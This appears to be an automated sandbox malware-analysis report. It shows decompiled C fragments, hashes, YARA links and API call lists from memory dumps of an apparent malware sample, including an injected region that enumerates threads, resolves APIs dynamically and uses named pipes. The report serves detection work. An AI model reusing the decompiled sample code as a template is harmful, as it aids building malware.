Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 466aae618b5d322dd472fea904bd5fed977f6f3bd83f5e4a900624711bcb06c4
Instruction ID: 3df1dcbc29f8347b7e45e3ca60529a002ad996ed4a8eb069e385b83c7bdf9b75
Opcode Fuzzy Hash: 466aae618b5d322dd472fea904bd5fed977f6f3bd83f5e4a900624711bcb06c4
Instruction Fuzzy Hash: 6DB01297B582017CF12472841D93C370ECDC0C1B50330CDDAF800D00D1DC400C840033

Uniqueness

Uniqueness Score: -1.00%

Function 00B0AA75, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B0AA75() {

				E00B0ABF6(0xb0c2c4, 0xb0d0fc); // executed
				goto __eax;
			}

0x00b0aa4e
0x00b0aa55

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B0AA4E

Part of subcall function 00B0ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B0AC6F

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 0d8dde4794e542c020a7c70ea4cb826edb1c81fc35e5d61fa3d25e82d19e5604
Instruction ID: 05071f4ce90f31e69b48c0a326369345b1eaa94758cbc3f9d5abcd6446fd714e
Opcode Fuzzy Hash: 0d8dde4794e542c020a7c70ea4cb826edb1c81fc35e5d61fa3d25e82d19e5604
Instruction Fuzzy Hash: EDB01283358201ACF10472881DF3C370ECCC0C1B10330C9DAFC04C09C1E8400C450033

Uniqueness

Uniqueness Score: -1.00%

Function 00B0AA7F, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B0AA7F() {

				E00B0ABF6(0xb0c2c4, 0xb0d0f8); // executed
				goto __eax;
			}

0x00b0aa4e
0x00b0aa55

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B0AA4E

Part of subcall function 00B0ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B0AC6F

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 3cc8bfcc3d570bcb3dbfc19591e792d06d471364a60a96da8650e712d65541de
Instruction ID: 981da1c3a034cb17b1291bea34f9f10e62558ff6cac995a14d8811af7b2e9fe9
Opcode Fuzzy Hash: 3cc8bfcc3d570bcb3dbfc19591e792d06d471364a60a96da8650e712d65541de
Instruction Fuzzy Hash: A1B012C33583016CF20472881DB2C370ECCC0C1B10330CADAF804C05C1E8400C890033

Uniqueness

Uniqueness Score: -1.00%

Function 00B0AA61, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B0AA61() {

				E00B0ABF6(0xb0c2c4, 0xb0d104); // executed
				goto __eax;
			}

0x00b0aa4e
0x00b0aa55

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B0AA4E

Part of subcall function 00B0ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B0AC6F

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 2635feb47af7b18210fdeaf1115d6301c5c2fa89c62a8e75658abaf2ba4ac6e5
Instruction ID: 3078d8c63b1744f8052b1915dbf04a70afbc2737ea3ac4408b82e76dd2c67df1
Opcode Fuzzy Hash: 2635feb47af7b18210fdeaf1115d6301c5c2fa89c62a8e75658abaf2ba4ac6e5
Instruction Fuzzy Hash: 8FB012933582016CF10472881ED3C370ECCC0C1B10330CDDAF900C01C1DC804C450033

Uniqueness

Uniqueness Score: -1.00%

Function 00B0AA6B, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B0AA6B() {

				E00B0ABF6(0xb0c2c4, 0xb0d100); // executed
				goto __eax;
			}

0x00b0aa4e
0x00b0aa55

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B0AA4E

Part of subcall function 00B0ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B0AC6F

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 1276e42911fc97da1c7b9799f0567e9069188c3fd608836295e161e1a0eb028a
Instruction ID: 99e483b8c682236644135af35640fd4e6bc1cfb38217082cbb35c3357b9ff6c7
Opcode Fuzzy Hash: 1276e42911fc97da1c7b9799f0567e9069188c3fd608836295e161e1a0eb028a
Instruction Fuzzy Hash: 16B012933582016CF10472881D93D370ECCC0C5B10330CDDAF800C01C1DC804C440033

Uniqueness

Uniqueness Score: -1.00%

Function 00B0AA57, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B0AA57() {

				E00B0ABF6(0xb0c2c4, 0xb0d108); // executed
				goto __eax;
			}

0x00b0aa4e
0x00b0aa55

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B0AA4E

Part of subcall function 00B0ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B0AC6F

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 586eef889db7b306faf28e8caaefbbaba7e159d491600f35f4fe490affd4e4a1
Instruction ID: 42838c5489dcde363c26eee3544314aa8476651c18aa9ccb5f4edcc85a0f00b1
Opcode Fuzzy Hash: 586eef889db7b306faf28e8caaefbbaba7e159d491600f35f4fe490affd4e4a1
Instruction Fuzzy Hash: 88B092923582016CA14472885992C370ECCC0C1B103208A9AB800C01C1988048840032

Uniqueness

Uniqueness Score: -1.00%

Function 00B0AB31, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B0AB31() {

				E00B0ABF6(0xb0c344, 0xb0d134); // executed
				goto __eax;
			}

0x00b0ab28
0x00b0ab2f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B0AB28

Part of subcall function 00B0ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B0AC6F

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 63f9155c5760163e90287c3735d151ad76b178e01273bd5ef65eaede9aa7c4a8
Instruction ID: 729d93094c1c041c71736bd0adff7c960909cd2341ba39802ecab5ec30723b07
Opcode Fuzzy Hash: 63f9155c5760163e90287c3735d151ad76b178e01273bd5ef65eaede9aa7c4a8
Instruction Fuzzy Hash: 4AB0129226A201ACF104624C1D23D371ECEC0C0B10330C9EBF800C41C0DC501C420233

Uniqueness

Uniqueness Score: -1.00%

Function 00B0AB16, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B0AB16() {

				E00B0ABF6(0xb0c344, 0xb0d124); // executed
				goto __eax;
			}

0x00b0ab28
0x00b0ab2f

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B0AB28

Part of subcall function 00B0ABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B0AC6F

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: f07b9c164dfea8ab4938d584c706757204e27c7e6fff300f5e467eed96e29764
Instruction ID: b6db3043cc91d2d0ab6da87feb03e6e26751d59004819edaa7f288a0c8592c1d
Opcode Fuzzy Hash: f07b9c164dfea8ab4938d584c706757204e27c7e6fff300f5e467eed96e29764
Instruction Fuzzy Hash: 7BB012B2268201BCF10822481D23D3B1ECDC0C0B10330C9EBF800D40C0DC516C420137

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A15A0, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E1A15A0(void* __eax, intOrPtr _a4) {

				 *0x6e1a41d0 =  *0x6e1a41d0 & 0x00000000;
				_push(0);
				_push(0x6e1a41cc);
				_push(1);
				_push(_a4);
				 *0x6e1a41c8 = 0xc; // executed
				L6E1A1764(); // executed
				return __eax;
			}

0x6e1a15a0
0x6e1a15a7
0x6e1a15a9
0x6e1a15ae
0x6e1a15b0
0x6e1a15b4
0x6e1a15be
0x6e1a15c3

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6E1A10E6,00000001,6E1A41CC,00000000), ref: 6E1A15BE

Memory Dump Source

Source File: 00000000.00000002.823219799.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.823180575.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823258279.000000006E1A3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.823310393.000000006E1A5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.823345888.000000006E1A6000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 35b3defcc7affdb2bfd51d2225016bd9120f8a85956a52ed7c41299791af06ae
Instruction ID: 9f25f97f5dc26fb7921e856dc1aada8db159201829fcb9dfc07330a2ade9ad8e
Opcode Fuzzy Hash: 35b3defcc7affdb2bfd51d2225016bd9120f8a85956a52ed7c41299791af06ae
Instruction Fuzzy Hash: 90C04CB8140701A6EB509B88CC45F7A7A51B761709F104A04F650251C0DBB5209AA51D

Uniqueness

Uniqueness Score: -1.00%

Function 00B075F6, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B075F6(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xb0d270, 0, _a4); // executed
				return _t2;
			}

0x00b07602
0x00b07608

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00B04F70), ref: 00B07602

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 23f32f6d0aa37e3b5944d503d0271bfcb34cc8ef4763296e1298d8ea6989704d
Instruction ID: 0a9df6626d62a916fffafd5eaabf0daa7b8ca46c5d07444f0d618b27fc641839
Opcode Fuzzy Hash: 23f32f6d0aa37e3b5944d503d0271bfcb34cc8ef4763296e1298d8ea6989704d
Instruction Fuzzy Hash: 5EB01271000100EBCE114B50DE08F057F31B770700F11C111B204410F0CB318424EF04

Uniqueness

Uniqueness Score: -1.00%

Function 00B55E9A, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000001,00B6295C), ref: 00B55EA6

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: cf0f1bbcef406daa7840772bbab03c9cb1296cb053f627873c98b7dd05e3b0c0
Instruction ID: a5750358a503ed799089e1c6f9203b7e7cba73c42fc515997768da9b5595a0a1
Opcode Fuzzy Hash: cf0f1bbcef406daa7840772bbab03c9cb1296cb053f627873c98b7dd05e3b0c0
Instruction Fuzzy Hash: 8EB01275100100ABCB014B00DE04F0A7A23E750700F008411F30C010708F3104A1FF05

Uniqueness

Uniqueness Score: -1.00%

Function 00B70757, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00B629D3,00000000), ref: 00B70763

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e9b19402ab027971e36790b64272f740c3f165d4b1a68f21816e33247b150b4e
Instruction ID: 0f1ef0b76df2bca85f828e67a96158010ed0238508f9a3503fd212177196f9d7
Opcode Fuzzy Hash: e9b19402ab027971e36790b64272f740c3f165d4b1a68f21816e33247b150b4e
Instruction Fuzzy Hash: FEB01235000200ABCB014B00DD08F067B23E750700F008811F20C410708B3104E5FF05

Uniqueness

Uniqueness Score: -1.00%

Function 00B016D9, Relevance: 1.3, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B016D9(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t6 = _t60 - 0x80; // 0xff50e045
					_t58 =  &_v164;
					_t37 = E00B07A73(__eax, __edx,  &_v164,  &_v16, _a4 + _t6);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E00B075F6(_t53);
						_v8 = _t51;
						_t73 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E00B04AAB(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E00B01890(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t42 = E00B05E74(_t61, _a4,  &_v8,  &_v12,  &_v144, 0); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}

0x00b016e4
0x00b016e7
0x00b016ee
0x00b016f1
0x00b016f4
0x00b016f9
0x00b017f2
0x00b017f6
0x00b0170b
0x00b0170e
0x00b01717
0x00b0171e
0x00b01725
0x00000000
0x00000000
0x00b0172b
0x00b01733
0x00000000
0x00000000
0x00b01739
0x00b01742
0x00b01746
0x00000000
0x00000000
0x00b01748
0x00b0174f
0x00b01754
0x00b01757
0x00b01759
0x00b017d7
0x00b017de
0x00b017e0
0x00000000
0x00000000
0x00b017e2
0x00b017e6
0x00b017eb
0x00b017eb
0x00000000
0x00b017e6
0x00b01760
0x00b01768
0x00b01768
0x00b01771
0x00b0177f
0x00b017d3
0x00b017d3
0x00000000
0x00b017a2
0x00b017a5
0x00000000
0x00b017a5
0x00b0177f
0x00b017bf
0x00b017c4
0x00b017c6
0x00b017db
0x00000000
0x00b017db
0x00b017c8
0x00b017ce
0x00b017d1
0x00000000
0x00000000
0x00000000
0x00b017d1

APIs

memcpy.NTDLL(00000000,00B0553A,?,?,?,00B0553A,FF50E045,00000002,00B0553A,00B0553A), ref: 00B01760

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: a5a4967f597e2a0de927d1f46372b8f9bc6baaedaab60074e759246f40830058
Instruction ID: 6882294a26d97e388714a7952dd3c9529312eedace70ab497f8b22324be4928d
Opcode Fuzzy Hash: a5a4967f597e2a0de927d1f46372b8f9bc6baaedaab60074e759246f40830058
Instruction Fuzzy Hash: 6A312FB5E0021DAFDF25DE99C8C0BAEBBF9FB14344F1048E9E505A7281D6709E85CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B77496, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B54C22: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,00000000,00000000,?,7673D3B0,74E05520,?,?,?,00B51F86,?), ref: 00B54C5A
Part of subcall function 00B54C22: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B54C6E
Part of subcall function 00B54C22: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B51F86,?,?,?), ref: 00B54C88
Part of subcall function 00B54C22: RegCloseKey.ADVAPI32(?,?,?,?,00B51F86,?,?,?), ref: 00B54CB2

HeapFree.KERNEL32(00000000,00B6AFCC,00000000,?,00B6AFCC,00000000,00000001,00000000,74E04D40,?,?,?,00B6AFCC,00000000), ref: 00B77528

Part of subcall function 00B52DDC: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,00B6F48D,00000000,00000001,-00000007,?,00000000), ref: 00B52DFE

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID:
API String ID: 1301464996-0
Opcode ID: 6f3c7568723fd9f25a459121d23547ba47fd742e0b2403b8da42dfe80d288077
Instruction ID: b11f7e6a3a3b9cb8abb0e4c49d7d69f2e60a300d9e067af9587a12b1592b6195
Opcode Fuzzy Hash: 6f3c7568723fd9f25a459121d23547ba47fd742e0b2403b8da42dfe80d288077
Instruction Fuzzy Hash: 3A112375654201EFCB14DF58DC90EAA77E8EB58302F1048E9F61A9B260DF70DD40CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00B5C74A, Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B54C22: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,00000000,00000000,?,7673D3B0,74E05520,?,?,?,00B51F86,?), ref: 00B54C5A
Part of subcall function 00B54C22: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B54C6E
Part of subcall function 00B54C22: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B51F86,?,?,?), ref: 00B54C88
Part of subcall function 00B54C22: RegCloseKey.ADVAPI32(?,?,?,?,00B51F86,?,?,?), ref: 00B54CB2

HeapFree.KERNEL32(00000000,00000000,00000000,00B811D4,?,00000000,?,?,?,00000000,00B669A3,00B70CD6,00000000,00000000), ref: 00B5C7BB

Part of subcall function 00B55570: StrChrA.SHLWAPI(00B811D4,0000002E,00000000,00000000,?,00B811D4,00B5E415,00000000,00000000,00000000), ref: 00B55582
Part of subcall function 00B55570: StrChrA.SHLWAPI(00000004,00000020,?,00B811D4,00B5E415,00000000,00000000,00000000), ref: 00B55591

Part of subcall function 00B616D2: CloseHandle.KERNEL32(00B6683A,?,00000000,00000000,00B5B0B2,00000000,00000000,00000000,00000000,74E5F5B0,00B6683A), ref: 00B616F8
Part of subcall function 00B616D2: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00B61704
Part of subcall function 00B616D2: GetModuleHandleA.KERNEL32(?,0434978E,?,00000000,00000000), ref: 00B61724
Part of subcall function 00B616D2: GetProcAddress.KERNEL32(00000000), ref: 00B6172B
Part of subcall function 00B616D2: Thread32First.KERNEL32(00B6683A,0000001C), ref: 00B6173B
Part of subcall function 00B616D2: CloseHandle.KERNEL32(00B6683A), ref: 00B61783

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
String ID:
API String ID: 2627809124-0
Opcode ID: 77486433662659e4a7c11e16feecfe01840d7564739ce3f978d029c2c3257201
Instruction ID: 4e87e367c6e3027847a7ed3ab0c55cd9b367036d67f581b41313776589b35ef6
Opcode Fuzzy Hash: 77486433662659e4a7c11e16feecfe01840d7564739ce3f978d029c2c3257201
Instruction Fuzzy Hash: 33017C76611205BF8B109BA8ED84D9FBBEDEB483857000495F90193121EF70AE45CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00B5E3B9, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B54C22: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,?,00000000,00000000,?,7673D3B0,74E05520,?,?,?,00B51F86,?), ref: 00B54C5A
Part of subcall function 00B54C22: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B54C6E
Part of subcall function 00B54C22: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B51F86,?,?,?), ref: 00B54C88
Part of subcall function 00B54C22: RegCloseKey.ADVAPI32(?,?,?,?,00B51F86,?,?,?), ref: 00B54CB2

HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,00B6699E,00B70CD6,00000000,00000000), ref: 00B5E42F

Part of subcall function 00B55570: StrChrA.SHLWAPI(00B811D4,0000002E,00000000,00000000,?,00B811D4,00B5E415,00000000,00000000,00000000), ref: 00B55582
Part of subcall function 00B55570: StrChrA.SHLWAPI(00000004,00000020,?,00B811D4,00B5E415,00000000,00000000,00000000), ref: 00B55591

Part of subcall function 00B7715A: lstrlen.KERNEL32(00B594DB,00000000,?,?,?,?,00B594DB,00000035,00000000,?,00000000), ref: 00B7718A
Part of subcall function 00B7715A: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00B771A0
Part of subcall function 00B7715A: memcpy.NTDLL(00000010,00B594DB,00000000,?,?,00B594DB,00000035,00000000), ref: 00B771D6
Part of subcall function 00B7715A: memcpy.NTDLL(00000010,00000000,00000035,?,?,00B594DB,00000035), ref: 00B771F1
Part of subcall function 00B7715A: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 00B7720F
Part of subcall function 00B7715A: GetLastError.KERNEL32(?,?,00B594DB,00000035), ref: 00B77219
Part of subcall function 00B7715A: HeapFree.KERNEL32(00000000,00000000,?,?,00B594DB,00000035), ref: 00B7723C

Memory Dump Source

Source File: 00000000.00000002.820887308.0000000000B50000.00000040.00020000.sdmp, Offset: 00B50000, based on PE: false

Similarity

API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
String ID:
API String ID: 730886825-0
Opcode ID: ed979b0f769f110e2a9d6ddd2af2ecff1607bbda4739329f427736c971a91a55
Instruction ID: 7a2ebf85be795323f75c1287731c412aefcdc7347c7dea57c523847f07f5785a
Opcode Fuzzy Hash: ed979b0f769f110e2a9d6ddd2af2ecff1607bbda4739329f427736c971a91a55
Instruction Fuzzy Hash: 9701BC31611205BBDB24DB98DC09F8E7BECEB08751F0040D5FA15A32A0EBB0BA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00B05DDA, Relevance: 1.3, APIs: 1, Instructions: 26
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B05DDA(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E00B01138(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E00B058AE(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}

0x00b05de2
0x00b05dfc
0x00000000
0x00b05e18
0x00b05df3
0x00b05dfa
0x00000000
0x00000000
0x00b05e1f

APIs

lstrlenW.KERNEL32(?,?,?,00B029F4,3D00B0C0,80000002,00B02197,00B0258B,74666F53,4D4C4B48,00B0258B,?,3D00B0C0,80000002,00B02197,?), ref: 00B05DFF

Part of subcall function 00B058AE: SysAllocString.OLEAUT32(00B0258B), ref: 00B058C7
Part of subcall function 00B058AE: SysFreeString.OLEAUT32(00000000), ref: 00B05908

Memory Dump Source

Source File: 00000000.00000002.820669375.0000000000B01000.00000020.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.820637084.0000000000B00000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820763060.0000000000B0C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.820819562.0000000000B0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.820852488.0000000000B0F000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
Opcode ID: b1bca90a7d82fb4b3c57d8338526db807b9ee5c29452ac6c1f8e8f1a4a9cdd06
Instruction ID: 3b776955307f76dbee8cca9a4686d09debd812d76691d239ccd3291cc66782a3
Opcode Fuzzy Hash: b1bca90a7d82fb4b3c57d8338526db807b9ee5c29452ac6c1f8e8f1a4a9cdd06
Instruction Fuzzy Hash: 62F0923201020EBFDF165F90DC06E9B3FAAEB18750F048555BA04540B1DB32C9B1EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B03720, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B03720(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E00B01C11(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E00B04AAB(_a4);
				}
				return _t12;
			}

0x00b0372c
0x00b03731
0x00b03735
0x00b0373c
0x00b03747
0x00b0374b
0x00b0374b
0x00b03754

APIs

